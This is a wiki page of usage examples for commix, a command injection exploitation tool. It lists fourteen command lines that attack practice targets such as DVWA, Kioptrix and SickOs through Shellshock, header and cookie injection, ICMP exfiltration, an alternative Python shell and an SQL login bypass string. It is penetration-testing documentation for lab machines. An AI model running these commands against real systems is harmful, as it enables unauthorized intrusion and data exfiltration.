Usage Examples

Anastasios Stasinopoulos edited this page Nov 19, 2017 · 25 revisions

1. Exploiting Damn Vulnerable Web App:

root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:

root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:

root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):

root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:

root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:

root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:

root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:

root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"


You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.